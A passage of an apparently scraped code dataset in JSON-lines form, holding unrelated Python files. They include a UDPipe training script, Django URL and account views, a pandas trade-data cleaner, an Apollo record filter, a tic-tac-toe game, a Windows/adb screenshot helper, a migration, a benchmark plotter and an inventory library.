self.corpusName = corpusName\n self.language = language\n\n try:\n self.storeData = Store(\n db_config['user'],\n db_config['password'],\n dbHost=db_config['db_host'],\n dbName=db_config['db_name'])\n\n self.cursor = self.storeData.dbConnect().cursor()\n # self.cursor = conn.cursor()\n\n except Exception as e:\n print(e)\n\n def loadData(self):\n try:\n with open(self.corpusName,'r',encoding=\"utf8\") as file:\n return self.cleanData(file.read())\n except Exception as e:\n print('File cant be opened cox of {}'.format(e))\n\n def cleanData(self,data: str) -> str:\n data = re.sub(\"[\\n\\t]\",\"\",data)\n return data\n\n def doTrain(self) -> List[Result]:\n model = Model(self.modelName)\n corpusData = self.loadData()\n word_pos = list(model.process(corpusData))\n line_no = 0\n for index,sentence in enumerate(word_pos):\n singleSentence = self.extractSingleSentence(sentence)\n singleWord = self.extractSingleWord(sentence,singleSentence)\n self.storeData.insertData(self.cursor, singleWord,self.language)\n print('line %d, batch %d for %s written succeed' % (line_no,index,self.language))\n line_no += 1\n\n def extractSingleSentence(self,sentence) -> str:\n comment = \"\".join(sentence.comments)\n cs = re.findall(r'text = (.*)',comment)[0]\n return cs\n\n def extractSingleWord(self,sentence,sentence_text) -> [Result]:\n combinedData = []\n for word in sentence.words:\n if word.lemma not in string.punctuation:\n if word.lemma and word.upostag and sentence_text:\n combinedData.append(Result(word.lemma,word.upostag,sentence_text))\n return combinedData\n\n\nif __name__ == \"__main__\":\n udt = Udtrain(r\"C:\\Users\\haris\\Desktop\\wordFinder\\english-ewt-ud-2.5-191206.udpipe\",\n r\"C:\\Users\\haris\\Desktop\\wordFinder\\haris.txt\", \"English\")\n udt.doTrain()\n# storeData = Store()\n","repo_name":"harisalam/CSC-5030","sub_path":"myProject/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73680625751","text":"\"\"\"\nsetup URL Configuration\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework.permissions import AllowAny\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n 
title=\"Django Crawler App\",\n default_version=\"v1\",\n description=\"API documentation for Django Crawler App\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"\"),\n license=openapi.License(name=\"Test License\"),\n ),\n public=True,\n permission_classes=(AllowAny,),\n)\n\nurlpatterns = [\n path(\n \"api/doc\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema-swagger-ui\",\n ),\n path(\"admin/\", admin.site.urls),\n path(\"api/\", include(\"loan.urls\")),\n]\n","repo_name":"coding-rev/Django-Loan-Test-App","sub_path":"setup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36339273081","text":"import pandas as pd\nimport time\nimport numpy as np\n\nclass data_clearn:\n\n @staticmethod\n def resp_to_df(resp):\n content = resp\n df = data_clearn.get_a_model()\n json_list = []\n for data in content[\"data\"]:\n index = {'block_timestamp': np.datetime64(data[\"timestamp\"],\"s\"),\n 'create_timestamp': int(time.time()),\n 'symbol': data[\"tokens_in\"][0][\"symbol\"] + \"_\" + data[\"tokens_out\"][0][\"symbol\"],\n 'net': data[\"tokens_in\"][0][\"network\"],\n 'amm':data[\"amm\"],\n 'chain_id':data[\"chain_id\"],\n 'transaction_address':data[\"transaction_address\"],\n 'block_number':data[\"block_number\"],\n 'token1':data[\"tokens_in\"][0][\"symbol\"],\n 'token1_price':data[\"tokens_in\"][0][\"price_usd\"],\n 'token1_amount':data[\"tokens_in\"][0][\"amount\"],\n 'token2':data[\"tokens_out\"][0][\"symbol\"],\n 'token2_price':data[\"tokens_out\"][0][\"price_usd\"],\n 'token2_amount':data[\"tokens_out\"][0][\"amount\"],\n 'wallet_address':data[\"wallet_address\"],\n 'wallet_category':data[\"wallet_category\"],\n 'pair_address':data[\"pair_address\"]\n }\n json_list.append(index)\n if len(json_list) == 0:\n return df\n df = df.append(json_list)\n df[\"create_timestamp\"] = pd.to_datetime(df[\"create_timestamp\"],unit='s')\n df['chain_id'] = df['chain_id'].astype('int64')\n df['block_number'] = df['block_number'].astype('int64')\n df[\"symbol\"] = df['symbol'].astype('string')\n return df\n\n\n\n @staticmethod\n def get_a_model():\n data = {'block_timestamp':[],\n 'create_timestamp':[],\n 'smybol': [],\n 'net': [],\n 'amm':[],\n 'chain_id':[],\n 'transaction_address':[],\n 'block_number':[],\n 'token1':[],\n 'token1_price':[],\n 'token1_amount':[],\n 'token2':[],\n 'token2_price':[],\n 'token2_amount':[],\n 'wallet_address':[],\n 'wallet_category':[],\n 'pair_address':[]\n }\n df = pd.DataFrame(data)\n return df","repo_name":"imsellbaox/guru_communication","sub_path":"HandlerData/utils/data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8467922244","text":"import argparse\nimport glob\nimport os\nimport sys\n\nimport glog\n\nfrom cyber.python.cyber_py3 import cyber\nfrom cyber.python.cyber_py3.record import RecordReader\nfrom cyber.python.cyber_py3.record import RecordWriter\n\n\nclass SamplePNC(object):\n \"\"\"Sample bags to contain PNC related topics only.\"\"\"\n TOPICS = [\n '/apollo/sensor/conti_radar',\n '/apollo/sensor/delphi_esr',\n '/apollo/sensor/gnss/best_pose',\n '/apollo/sensor/gnss/corrected_imu',\n '/apollo/sensor/gnss/gnss_status',\n '/apollo/sensor/gnss/imu',\n '/apollo/sensor/gnss/ins_stat',\n '/apollo/sensor/gnss/odometry',\n '/apollo/sensor/gnss/rtk_eph',\n 
'/apollo/sensor/gnss/rtk_obs',\n '/apollo/sensor/mobileye',\n '/apollo/canbus/chassis',\n '/apollo/canbus/chassis_detail',\n '/apollo/control',\n '/apollo/control/pad',\n '/apollo/navigation',\n '/apollo/perception/obstacles',\n '/apollo/perception/traffic_light',\n '/apollo/planning',\n '/apollo/prediction',\n '/apollo/routing_request',\n '/apollo/routing_response',\n '/apollo/localization/pose',\n '/apollo/drive_event',\n '/tf',\n '/tf_static',\n '/apollo/monitor',\n '/apollo/monitor/system_status',\n '/apollo/monitor/static_info',\n ]\n\n @classmethod\n def process_record(cls, input_record, output_record):\n print(\"filtering: {} -> {}\".format(input_record, output_record))\n output_dir = os.path.dirname(output_record)\n if output_dir != \"\" and not os.path.exists(output_dir):\n os.makedirs(output_dir)\n freader = RecordReader(input_record)\n fwriter = RecordWriter()\n if not fwriter.open(output_record):\n print('writer open failed!')\n return\n print('----- Begin to process record -----')\n for channelname, msg, datatype, timestamp in freader.read_messages():\n if channelname in SamplePNC.TOPICS:\n desc = freader.get_protodesc(channelname)\n fwriter.write_channel(channelname, datatype, desc)\n fwriter.write_message(channelname, msg, timestamp)\n print('----- Finish processing record -----')\n\n\nif __name__ == '__main__':\n cyber.init()\n parser = argparse.ArgumentParser(\n description=\"Filter pnc record. \\\n Usage: 'python sample_pnc_topic.py input_record output_record'\")\n parser.add_argument('input', type=str, help=\"the input record\")\n parser.add_argument('output', type=str, help=\"the output record\")\n args = parser.parse_args()\n SamplePNC.process_record(args.input, args.output)\n cyber.shutdown()\n","repo_name":"ApolloAuto/apollo","sub_path":"modules/tools/rosbag/sample_pnc_topics.py","file_name":"sample_pnc_topics.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":23653,"dataset":"github-code","pt":"5"} +{"seq_id":"28388897476","text":"#CSCI 1133 Homework 3\n#Elizabeth Olson\n#Bonus Problem\n\nimport random\nx = True\ny = True\n\nwhile y == True: #allows for the user to decide if they want to play again later in the code\n board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']] #initialize the empty board\n while x == True:\n\n #initialize the counts for the column totals\n totalx0 = 0\n totalx1 = 0\n totalx2 = 0\n totalo0 = 0\n totalo1 = 0\n totalo2 = 0\n\n play1 = int(input(\"Player 1, where would you like to move? 
\")) #ask the user where they want to move\n if play1 == 0 or play1 == 1 or play1 == 2: #first list/row conditions\n if board[0][play1] is 'x' or board[0][play1] is 'o':\n print('Sorry, that space is already taken')\n continue\n else:\n board[0][play1] = 'x'\n if play1 == 3 or play1 == 4 or play1 == 5: #second list/row conditions\n if board[1][play1-3] is 'x' or board[1][play1-3] is 'o':\n print('Sorry, that space is already taken')\n continue\n else:\n board[1][play1-3] = 'x'\n if play1 == 6 or play1 == 7 or play1 == 8: #third list/row conditions\n if board[2][play1-6] is 'x' or board[2][play1-6] is 'o':\n print('Sorry, that space is already taken')\n continue\n else:\n board[2][play1-6] = 'x'\n\n for i in board: #prints the board in the desired way, with each list on separate lines\n print(i)\n\n #calculations for the number of x's or o's in a row\n ax = board[0].count('x') + board[1].count('x') + board[2].count('x')\n ao = board[0].count('o') + board[1].count('o') + board[2].count('o')\n\n if ax == 5 and ao == 4: #if the board is full and no win conditions are met\n print(\"It's a tie!\")\n x = False\n\n #if the player has a winning row\n if board[0].count('x') == 3 or board[1].count('x') == 3 or board[2].count('x') == 3:\n print(\"You win!\")\n x = False\n\n #if the player has a winning column\n for i in [0,1,2]:\n if board[0][i] == 'x' and board[1][i] == 'x' and board[2][i] == 'x':\n print(\"You win!\")\n x = False\n\n #if the player has a winning diagonal\n if board[0][0] == 'x' and board[1][1] == 'x' and board[2][2] == 'x':\n print(\"You win!\")\n x = False\n if board[0][2] == 'x' and board[1][1] == 'x' and board[2][0] == 'x':\n print(\"You win!\")\n x = False\n\n #beginning of the code for the computer's turn\n #counts the number of x's and o's in a column to be used later\n for i in range(3):\n totalx0 += board[i][0].count('x')\n totalx1 += board[i][1].count('x')\n totalx2 += board[i][2].count('x')\n totalo0 += board[i][0].count('o')\n totalo1 += board[i][1].count('o')\n totalo2 += board[i][2].count('o')\n\n #will only print this if the player has not won already\n if x == True:\n print(\"My turn!\")\n while x == True:\n\n #if computer has 2 in any row, place o in left over spot to win accounting for not having any x's\n if board[0].count('o') == 2 and board[0].count('x') == 0:\n for i in range(3):\n if board[0][i] != 'x':\n board[0][i] = 'o'\n print(\"I win!\")\n x = False\n elif board[1].count('o') == 2 and board[1].count('x') == 0:\n for i in range(3):\n if board[1][i] != 'x':\n board[1][i] = 'o'\n print(\"I win!\")\n x = False\n elif board[2].count('o') == 2 and board[2].count('x') == 0:\n for i in range(3):\n if board[2][i] != 'x':\n board[2][i] = 'o'\n print(\"I win!\")\n x = False\n\n #if computer has 2 in any column, place o in left over spot to win accounting for not having any x's\n elif totalo0 == 2 and totalx0 == 0:\n for i in range(3):\n if board[i][0] != 'o':\n if board[i][0] != 'x':\n board[i][0] = 'o'\n print(\"I win!\")\n x = False\n continue\n elif totalo1 == 2 and totalx1 == 0:\n for i in range(3):\n if board[i][1] != 'o':\n if board[i][1] != 'x':\n board[i][1] = 'o'\n print(\"I win!\")\n x = False\n continue\n elif totalo2 == 2 and totalx2 == 0:\n for i in range(3):\n if board[i][2] != 'o':\n if board[i][2] !='x':\n board[i][2] = 'o'\n print(\"I win!\")\n x = False\n continue\n\n #if computer has 2 in a diagonal position, place an o in the last diagonal position to win accounting for not having any x's\n elif board[0][0] == 'o' and board[1][1] == 'o' and 
board[2][2] != 'x':\n board[2][2] = 'o'\n print(\"I win!\")\n x = False\n elif board[0][0] == 'o' and board[2][2] == 'o' and board[1][1] != 'x':\n board[1][1] = 'o'\n print(\"I win!\")\n x = False\n elif board[1][1] == 'o' and board[2][2] == 'o' and board[0][0] != 'x':\n board[0][0] = 'o'\n print(\"I win!\")\n x = False\n elif board[0][2] == 'o' and board[1][1] == 'o' and board[2][0] != 'x':\n board[2][0] = 'o'\n print(\"I win!\")\n x = False\n elif board[0][2] == 'o' and board[2][0] == 'o' and board[1][1] != 'x':\n board[1][1] = 'o'\n print(\"I win!\")\n x = False\n elif board[1][1] == 'o' and board[2][0] == 'o' and board[0][2] != 'x':\n board[0][2] = 'o'\n print(\"I win!\")\n x = False\n\n #if player 1 has 2 in any row, place o in left over spot to block\n elif board[0].count('x') == 2 and board[0].count('o') == 0:\n for i in range(3):\n if board[0][i] != 'x':\n board[0][i] = 'o'\n break\n elif board[1].count('x') == 2 and board[1].count('o') == 0:\n for i in range(3):\n if board[1][i] != 'x':\n board[1][i] = 'o'\n break\n elif board[2].count('x') == 2 and board[2].count('o') == 0:\n for i in range(3):\n if board[2][i] != 'x':\n board[2][i] = 'o'\n break\n\n #if player 1 has 2 in any column, place o in left over spot to block\n elif totalx0 == 2 and totalo0 == 0:\n for i in range(3):\n if board[i][0] != 'x':\n if board[i][0] != 'o':\n board[i][0] = 'o'\n break\n elif totalx1 == 2 and totalo1 == 0:\n for i in range(3):\n if board[i][1] != 'x':\n if board[i][1] != 'o':\n board[i][1] = 'o'\n break\n elif totalx2 == 2 and totalo2 == 0:\n for i in range(3):\n if board[i][2] != 'x':\n if board[i][2] !='o':\n board[i][2] = 'o'\n break\n\n #if player 1 has 2 in a diagonal position, place an o in the last diagonal position to block\n elif board[0][0] == 'x' and board[1][1] == 'x' and board[2][2] !='o':\n board[2][2] = 'o'\n break\n elif board[0][0] == 'x' and board[2][2] == 'x' and board[1][1] !='o':\n board[1][1] = 'o'\n break\n elif board[1][1] == 'x' and board[2][2] == 'x' and board[0][0] !='o':\n board[0][0] = 'o'\n break\n elif board[0][2] == 'x' and board[1][1] == 'x' and board[2][0] !='o':\n board[2][0] = 'o'\n break\n elif board[0][2] == 'x' and board[2][0] == 'x' and board[1][1] !='o':\n board[1][1] = 'o'\n break\n elif board[1][1] == 'x' and board[2][0] == 'x' and board[0][2] !='o':\n board[0][2] = 'o'\n break\n\n #if none of the winning or blocking conditions are met, get a random number for the computer to move to\n else:\n play2 = random.randint(0,8)\n if play2 == 0 or play2 == 1 or play2 == 2:\n if board[0][play2] is 'x' or board[0][play2] is 'o':\n continue\n else:\n board[0][play2] = 'o'\n if play2 == 3 or play2 == 4 or play2 == 5:\n if board[1][play2-3] is 'x' or board[1][play2-3] is 'o':\n continue\n else:\n board[1][play2-3] = 'o'\n if play2 == 6 or play2 == 7 or play2 == 8:\n if board[2][play2-6] is 'x' or board[2][play2-6] is 'o':\n continue\n else:\n board[2][play2-6] = 'o'\n break\n\n for i in board:\n print(i)\n\n #allows for the quick replaying and testing\n again = str(input(\"Would you like to play again? 
(y/n) \"))\n if again == 'y':\n x = True\n elif again == 'n':\n y = False\n","repo_name":"olso6928/SampleProjects","sub_path":"Introduction-to-python(CSCI1133)/Tic-Tac-Toe Basic AI homework/Tic-Tac-Toe_complex.py","file_name":"Tic-Tac-Toe_complex.py","file_ext":"py","file_size_in_byte":9957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34634213887","text":"import cv2\nimport os\nimport datetime\nimport win32gui, win32ui, win32con, win32api\nfrom ctypes import windll\nimport numpy\nimport base64\nfrom PIL import Image\n\nDEBUGING = True\n# DEBUGING = False\n\ndef SHOW_IMAGE(image):\n if DEBUGING:\n now = datetime.datetime.now()\n now = str(now)\n cv2.imshow(now, image)\n cv2.waitKey()\n cv2.destroyWindow(now)\n else:\n pass\n\n# 需手动获取窗口曲柄&Rect\ndef GetScreenshot(win_handle, win_rect):\n hWnd = win_handle\n left, top, right, bot = win_rect\n width = right - left\n height = bot - top\n\n hWndDC = win32gui.GetWindowDC(hWnd)\n mfcDC = win32ui.CreateDCFromHandle(hWndDC)\n saveDC = mfcDC.CreateCompatibleDC()\n saveBitMap = win32ui.CreateBitmap()\n saveBitMap.CreateCompatibleBitmap(mfcDC,width,height)\n saveDC.SelectObject(saveBitMap)\n saveDC.BitBlt((0,0), (width,height), mfcDC, (0, 0), win32con.SRCCOPY)\n signedIntsArray = saveBitMap.GetBitmapBits(True)\n\n im_opencv = numpy.frombuffer(signedIntsArray, dtype = 'uint8')\n im_opencv.shape = (height, width, 4)\n cv2.cvtColor(im_opencv, cv2.COLOR_BGRA2RGB)\n \n win32gui.DeleteObject(saveBitMap.GetHandle())\n saveDC.DeleteDC()\n mfcDC.DeleteDC()\n win32gui.ReleaseDC(hWnd,hWndDC)\n\n return im_opencv\ndef GetScreenshotByAdb():\n os.system('adb shell screencap -p /sdcard/temp.png')\n os.system('adb pull /sdcard/temp.png ../Pics/')\n image = cv2.imread(\"../Pics/temp.png\")\n image = cv2.resize(image, (image.shape[0]//2, image.shape[1]//2))\n return image\n","repo_name":"Alex-Beng/SuperStarSillyScrubScript","sub_path":"Src/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11927563339","text":"from django.shortcuts import render,redirect\r\nfrom django.contrib.auth import login as user_login,logout as user_logout\r\nfrom .forms import UserRegistrationForm,UserLoginForm,UpdateProfileForm\r\nfrom store.models import Customer\r\nfrom store.decorators import check_access\r\nfrom django.contrib import messages\r\n\r\n@check_access(allowed_users=['anonymous',])\r\ndef register(request):\r\n if request.method =='POST':\r\n form=UserRegistrationForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n user_obj=form.instance\r\n print(user_obj)\r\n Customer.objects.create(user=user_obj)\r\n messages.success(request,'Account created successfully! 
please login')\r\n return redirect('accounts:login')\r\n return render(request,'accounts/register.html',{'form':form,})\r\n form=UserRegistrationForm()\r\n return render(request,'accounts/register.html',{'form':form,})\r\n\r\n@check_access(allowed_users=['anonymous',])\r\ndef login(request):\r\n path=request.GET.get('next')\r\n if request.method=='POST':\r\n form=UserLoginForm(request.POST)\r\n if form.is_valid():\r\n user_obj=form.cleaned_data.get('user_obj')\r\n user_login(request,user_obj)\r\n messages.success(request,'You have logged in successfully!')\r\n if user_obj.user_role.role == 'Customer':\r\n if path == None or path == '/accounts/logout/':\r\n return redirect('store:home')\r\n return redirect(path)\r\n elif user_obj.user_role.role == 'ShopOwner':\r\n return redirect('business:shop-owner-home')\r\n elif user_obj.user_role.role == 'DeliveryBoy':\r\n return redirect('business:delivery-boy-home')\r\n elif user_obj.user_role.role == 'Staff':\r\n return redirect('business:staff-home')\r\n else:\r\n return redirect('business:admin-home')\r\n return render(request,'accounts/login.html',{'form':form,})\r\n form=UserLoginForm()\r\n return render(request,'accounts/login.html',{'form':form,})\r\n\r\n@check_access(allowed_users=['Customer','ShopOwner','DeliveryBoy','Admin','Staff',])\r\ndef logout(request):\r\n if request.user.is_authenticated:\r\n user_logout(request)\r\n return render(request,'accounts/logout.html')\r\n\r\n@check_access(allowed_users=['Customer',])\r\ndef customer_profile_update_view(request):\r\n if request.user.is_authenticated:\r\n if request.method == 'POST':\r\n form=UpdateProfileForm(request.POST,instance=request.user)\r\n if form.is_valid():\r\n form.save()\r\n messages.success(request,'Your Profile has updated successfully!')\r\n return redirect('accounts:update-customer-profile')\r\n return render(request,'accounts/update_profile.html',{'form':form,})\r\n form=UpdateProfileForm(instance=request.user)\r\n return render(request,'accounts/update_profile.html',{'form':form,})\r\n return render(request,'store/error.html')","repo_name":"bobby2510/VegMart","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"3236030863","text":"# -*- coding: utf-8 -*-\n\n\nimport re\n\nfrom django.db import migrations\n\n\ndef create_history_entry(obj, dbh, src):\n _dh = obj(\n device=dbh.device,\n device_boot_history=dbh,\n version=src.version,\n release=src.release,\n )\n return _dh\n\n\ndef migrate_kernel_image(apps, schema_editor):\n device = apps.get_model(\"backbone\", \"device\")\n boot_history = apps.get_model(\"backbone\", \"DeviceBootHistory\")\n kernel = apps.get_model(\"backbone\", \"kernel\")\n kernel_hist = apps.get_model(\"backbone\", \"KernelDeviceHistory\")\n image = apps.get_model(\"backbone\", \"image\")\n image_hist = apps.get_model(\"backbone\", \"ImageDeviceHistory\")\n VERS_RE = re.compile(\"^(?P\\d+)\\.(?P\\d+)$\")\n for _dev in device.objects.all():\n if _dev.act_kernel_id and _dev.act_image_id:\n # only handle cases where act_image and act_kernel are set\n dbh = boot_history.objects.create(device=_dev)\n _kh = create_history_entry(kernel_hist, dbh, _dev.act_kernel)\n _kh.kernel = _dev.act_kernel\n kvm = VERS_RE.match(_dev.kernelversion)\n if kvm:\n _kh.version = int(kvm.group(\"version\"))\n _kh.release = int(kvm.group(\"release\"))\n _kh.save()\n _ih = create_history_entry(image_hist, dbh, _dev.act_image)\n 
_ih.image = _dev.act_image\n ivm = VERS_RE.match(_dev.imageversion)\n if ivm:\n _ih.version = int(ivm.group(\"version\"))\n _ih.release = int(ivm.group(\"release\"))\n _ih.save()\n\n\ndef dummy_reverse(apps, schema_editor):\n pass\n\n\nclass Migration(migrations.Migration):\n\n reversible = True\n\n dependencies = [\n ('backbone', '0819_add_device_image_history'),\n ]\n\n operations = [\n migrations.RunPython(migrate_kernel_image, reverse_code=dummy_reverse)\n ]\n","repo_name":"walong365/icsw","sub_path":"initat/cluster/backbone/migrations/0820_data_migrate_kernel_images.py","file_name":"0820_data_migrate_kernel_images.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26447395164","text":"#!/bin/python\n\n#Script that plot graphs used in the document\n\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\n\n\nROOT_DIR=\"../../\"\n\nN_TEST = 10\nMIN_NODES = 3\nMAX_NODES = 8\ntree={}\nnodes=[]\n\nx_ar = []\npig_header=[\"date\",\"matrix\",\"n_nodes\",\"time\"]\nlog_header=[\"n_nodes\",\"matrix\",\"test\",\"job\",\"jobId\",\"alias\",\"operation\",\"node\",\"time\"]\npig_file = open(ROOT_DIR+\"log/pig_times.txt\", \"r\")\nlog_file = open(ROOT_DIR+\"log/pig_matrix-mul_extra-fine.csv\", \"r\")\n\n#pre-processing\npig_csv = csv.DictReader(pig_file,fieldnames=pig_header,delimiter=\",\")\nlog_csv = csv.DictReader(log_file,fieldnames=log_header,delimiter=\";\")\n\nprint(\"Building pig_csv tree\")\nfor row in pig_csv:\n\tmat = row[\"matrix\"]\n\tif(row[\"matrix\"] not in tree.keys() ):\n\t\ttree[mat]={}\n\t\tfor i in range(MIN_NODES,MAX_NODES+1):\n\t\t\ttree[mat][str(i)]=[]\n\ttree[ mat ][row[\"n_nodes\"]].append( float(row[\"time\"]) )\n\nprint(\"Building log_csv tree\")\nlog_tree={}\nfor row in log_csv:\n\tmat=row[\"matrix\"]\n\tif(row[\"matrix\"] not in log_tree.keys() ):\n\t\tlog_tree[mat]={}\n\t\tfor i in range(MIN_NODES,MAX_NODES+1):\n\t\t\tlog_tree[mat][str(i)]={}\n\tnode_id=row[\"node\"]\n\tif(node_id not in nodes):\n\t\tnodes.append(node_id)\n\tif(node_id not in log_tree[mat][row[\"n_nodes\"]].keys()):\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id]={}\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id][1]=0\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id][2]=0\n\telse:\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id][int(row[\"job\"])] = log_tree[mat][row[\"n_nodes\"]][node_id][int(row[\"job\"])] + float(row[\"time\"])\n\nfor mat in log_tree:\n\tfor n_nodes in log_tree[mat]:\n\t\tfor node in log_tree[mat][n_nodes]:\n\t\t\tfor job in log_tree[mat][n_nodes][node]:\n\t\t\t\tlog_tree[mat][n_nodes][node][job]=log_tree[mat][n_nodes][node][job]/10\n\nfor node in nodes:\n\tfor mat in log_tree:\n\t\tplt.clf()\n\t\tplt.title(\"Job time \"+node+\"_\"+mat)\n\t\tplt.xlabel(\"n_workers\")\n\t\tplt.ylabel(\"time [s]\")\n\t\tplot_ar=[[None]*(MAX_NODES+1),[None]*(MAX_NODES+1)]\n\t\tfor n_nodes in log_tree[mat]:\n\t\t\ttry:\n\t\t\t\tfor job in log_tree[mat][n_nodes][node]:\n\t\t\t\t\tplot_ar[int(job)-1][ int(n_nodes)]=log_tree[mat][n_nodes][node][job]\n\t\t\texcept Exception: continue\n\t\tfor ar in plot_ar:\n\t\t\tplt.plot(ar,label=\"job\"+ str( plot_ar.index(ar)+1)+\" \"+mat )\n\t\tplt.legend()\n\t\tplt.savefig(ROOT_DIR+\"/doc/img/job_\"+node+\"_\"+mat+\".png\")\n\nprint(\"Plotting cumulative exec time per job\")\nfor mat in log_tree:\n\tplt.clf()\n\tplt.title(\"Overlapping job time, \"+mat)\n\tplt.xlabel(\"n_workers\")\n\tplt.ylabel(\"time [s]\")\n\tfor node in 
nodes:\n\t\tplot_ar=[[None]*(MAX_NODES+1),[None]*(MAX_NODES+1)]\n\t\tfor n_nodes in log_tree[mat]:\n\t\t\ttry:\n\t\t\t\tfor job in log_tree[mat][n_nodes][node]:\n\t\t\t\t\tplot_ar[int(job)-1][ int(n_nodes)]=log_tree[mat][n_nodes][node][job]\n\t\t\texcept Exception: continue\n\t\tfor ar in plot_ar:\n\t\t\tplt.plot(ar,label=\"job\"+ str( plot_ar.index(ar)+1)+\" \"+mat )\n\t\tplt.savefig(ROOT_DIR+\"/doc/img/global_job\"+\"_\"+mat+\".png\")\n\n#plot mean exec time with boxes\nprint(\"Plotting mean exec time\")\nfor matrix in tree:\n\tar_time=[]\n\tfor i in range(MIN_NODES, MAX_NODES+1):\n\t\tar_time.append(tree[matrix][str(i)] )\n\tplt.clf()\n\tplt.title(\"Total Execution time \"+matrix)\n\tplt.xlabel(\"n_workers-2\")\n\tplt.ylabel(\"time [s]\")\n\tplt.boxplot(ar_time, 0, '')\n\tplt.savefig(ROOT_DIR+\"doc/img/box_\"+matrix+\".png\")\n\n#plot speedup\nprint(\"Plotting speedup\")\n\n#init x_axis\nx_avg=[]\nfor item in tree[\"m500\"]:\n\t\tx_avg.append(int(item))\n\navg={}\navg_sorted={}\nfor matrix in tree:\n\tavg[matrix]=[]\n\tfor item in tree[matrix]:\n\t\tavg[matrix].append(np.mean(tree[matrix][item]))\n\nfor matrix in tree:\n\tavg_sorted[matrix] = sorted(avg[matrix], key=lambda elem: x_avg[avg[matrix].index(elem)])\n\nfor matrix in tree:\n\tbase = copy.deepcopy(avg_sorted[matrix][0])\n\tfor i in range(0,len(avg_sorted[matrix])):\n\t\tavg_sorted[matrix][i] = base/avg_sorted[matrix][i]\n\nx_avg.sort()\n\nfor matrix in tree:\n\tplt.clf()\n\tplt.title(\"Speed up \"+matrix)\n\tplt.xlabel(\"n_workers\")\n\tplt.plot(x_avg,avg_sorted[matrix],label=\"speed up \"+matrix)\n\tplt.legend()\n\tplt.savefig(ROOT_DIR+\"doc/img/speedup_\"+matrix+\".png\")\n\n\n\n\n\n\n\n","repo_name":"fusiled/hadoop-pig-matrix-multiplication-benchmark","sub_path":"src/post_test/graphPlotter.py","file_name":"graphPlotter.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41305895398","text":"\"\"\"Lib inventory\n\nThis module just as its name; implements Inventory system.\nHowever, you might see somewhat different implementations.\nThis module adapts typical staticallt allocated file system.\n\nFor extending the size of an Inventory, you can use inv.extend() function.\n\nNote: Inventory class is careful to its size; It'll scream at you when you are trying to append a new data on fully allocated Inventory.\"\"\"\n\nfrom __future__ import annotations\n\n__all__ = ['SameIdentifierException',\n 'FixedSizeArray', 'LinkedFSA', 'Inventory', 'null', 'fsa_null']\n\nfrom typing import Any, List, Literal, Union\nimport warnings\nfrom libshared import ConstCreator, PUID\n\nnull = ConstCreator.define('null', None)\nfsa_null = ConstCreator.define('', null)\n\n\nclass SameIdentifierException(Exception):\n \"\"\"The given argument is the same object as saved/operated object.\"\"\"\n\n\nclass FixedSizeArray:\n \"\"\"Fixed-size array (not so)\"\"\"\n\n def __init_subclass__(cls, **kwargs) -> None:\n raise Exception(\"Cannot subclass FSA.\")\n\n def __init__(self, size: int, noallocate=False):\n self._size = size\n self.__array: List[Union[ConstCreator, Any]] = [null]*size\n self.__fake_address_UUID = PUID.make_random()\n self.__fake_address = self.__fake_address_UUID.body.upper()\n self.__noalloc = noallocate\n self._name = None\n self._owner = None\n\n def insert(self, index: int, data: Any):\n \"\"\"Insert an object before index\"\"\"\n self._yell_at_externally_extended_size()\n if index > self._size-1:\n raise IndexError(\n \"Array index 
out of range; you can do self.allocate()")\n        self.__array.insert(index, data)\n        self.__array.pop(index+1)\n\n    def pop(self, index: int):\n        \"\"\"Remove and return an item at index.\"\"\"\n        self._yell_at_externally_extended_size()\n        self.__array.insert(index, null)\n        return self.__array.pop(index+1)\n\n    def remove(self, value):\n        \"\"\"Remove an item based on value\"\"\"\n        self._yell_at_externally_extended_size()\n        i = self.__array.index(value)\n        self.pop(i)\n\n    def __len__(self):\n        \"\"\"Implement len(self)\"\"\"\n        return self._size\n\n    def __iter__(self):\n        \"\"\"Implement iter(self)\"\"\"\n        return iter(self.__array)  # the original yielded the iterator object itself instead of the items\n\n    def clear(self):\n        \"\"\"Clear all items from the array.\"\"\"\n        self.__array.clear()\n        self.__array.extend([null]*self._size)\n\n    def copy(self, noalloc: bool = True) -> 'FixedSizeArray':\n        \"\"\"Return a copy of this array\"\"\"\n        ret = FixedSizeArray(self._size, noalloc)\n        for i, x in enumerate(self):\n            if x is null:\n                continue\n            ret.insert(i, x)\n        return ret  # the copy was built but never returned\n\n    @classmethod\n    def new(cls, *instances) -> 'FixedSizeArray':\n        \"\"\"Create a new FixedSizeArray\"\"\"\n        if len(instances) == 1:\n            if hasattr(instances[0], 